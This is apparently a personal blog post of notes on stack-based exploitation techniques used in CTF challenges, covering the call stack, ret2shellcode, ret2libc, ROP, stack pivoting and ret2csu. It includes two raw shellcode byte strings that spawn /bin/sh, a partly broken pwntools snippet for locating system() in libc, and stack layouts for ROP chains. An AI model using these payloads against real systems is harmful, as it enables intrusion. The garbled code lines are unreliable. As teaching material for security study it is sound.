

Jul 8, 2018 | 4 minutes read

Tags: pwn, stack, exploit


Inspired by shellphish’s how2heap tutorial on heap exploitation, I have decided to write a piece about stack based exploitation techniques that is commonly used in CTFs. This will be updated with new techniques I learn from various CTF competition write ups. For simplicity sake, I will use 32 bit binary convention as example. Should there be any thing different for the 64bit binaries, I will add a note below each technique.

This assumes understanding of how elf binaries work and different stack exploitation. This is not a tutorial for absolute beginners. It is more of a notes for myself.

Call Stack

The most basic concept that one must understand for stack based exploit is the Call Stack. It is the stack frame that is formed whenever a subroutine is called. It is the result of following the standard x86 calling conventions.

Caller will push parameters onto the stack from right to left. e.g add(1,2) will be

push 2
push 1
call add

the call instruction can be broken down into 2 simpler instructions

push return_addr 
jmp target			

A common program may look something like this

    push parameters     ; passing parameters, esp will move up with each push (up actually 
                                      ;means `sub esp` because up is towards lower address)
    call subroutine
    mov [ebx], eax		; do something with return value

    push ebp            ; saving ebp
    mov ebp, esp        ; creating subroute stack frame, this will correct corrupted ebp during exploitation
    sub esp, 0x??       ; creating space for local variables
    pop ebp

so a common call stack will look as follows:

[local var]     <- esp
[local var]
[local var]    
[saved ebp]    <- ebp
[return addr]   
[local vars]    
[saved ebp]
[return addr]

This will be essential for ROP later.

Exploit techniques

The most basic and easiest exploit. Condition required:

  • no NX
  • no/leak canary
  • enough space for shellcode
  • no/leak ASLR

Just overwrite return addr with stack addr pointing to shellcode on the stack.

linux x86-64: \x6a\x42\x58\xfe\xc4\x48\x99\x52\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5e\x49\x89\xd0\x49\x89\xd2\x0f\x05

linux x86: \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80

One_gadget github Just follow instructions

Condition required:

  • no/leak canary
  • no/leak ASLR

from pwn import *

libc = ELF('')

LEAKED_PUT_ADDR = leak_function()
LIBC_BASE = LEAKED_PUT_ADDR - libc.symbols['put']

SYSTEM_OFF = libc.symbols['system']

sh = LIBC_BASE + next('sh\x00'))
binsh = LIBC_BASE + next('/bin/sh\x00'))

set up call stack as follows:

[0x41414141]    <- overflown local buf
[LIBC_SYSTEM]   <- overflow return addr (eip overwrite)
[ret_after_sys] <- rerturn address after calling system
[binsh_addr]    <- parameter

this is essentially system('/bin/sh')

Awesome Slides. This is a pretty comprehensive guide to 32bit ROP which I will not spend too much time typing the same thing.

This is from slide 49 which I find pretty useful: Gadget Dictionary

For 64bit binaries, the first 6 parameters will be passed using registers. So the ROP gadget will require specific registers to be filled up.

Windows and Linux has different calling convention on which registers to be used. Since I deal with linux binaries most of the time, I will just note down the linux convention. For more information, please refer to this wiki page here

For linux,


any additional parameters will be passed through the stack.

Searching for standard pop pop pop ret (for write and read):

ropper --search "pop e??; pop e??; pop e??; ret"

Used when overflow is too small for our rop chain size.

PIE is enabled, pivot stack to known location.

Useful gadget for stack pivoting:

pop ?sp, ret;

pop ??x;
mov ?sp, ??x;

We can also reuse shellcode using the following actions:

jmp esp                 ; known location
sub esp; jmp esp        ; our shell code

We can use double leave to control esp. (The first leave is using the binary leave itself)

leave instruction is basically mov esp, ebp; pop ebp

gadget: leave; ret (I will call this lr_gadget)

setup stack frame as follows:


target_esp -> (a memory space we control, set up as follows)


Step by step:

  1. ebp = target_esp

  2. eip = lr_gadget

  3. enters the first lr_gadget, repeat leave; ret as follows

  4. esp = target_esp (ebp)

  5. ebp = start_of_fake_frame

  6. eip = target_function

Now we can work in the memory space we control.

for 64bit binaries, ret-2-csu can be abused to call arbitary functions with up to 3 parameters. Refer to document here

Advanced topic, still learning…

I am still learning this technique, will update it as soon as I understand it thoroughly.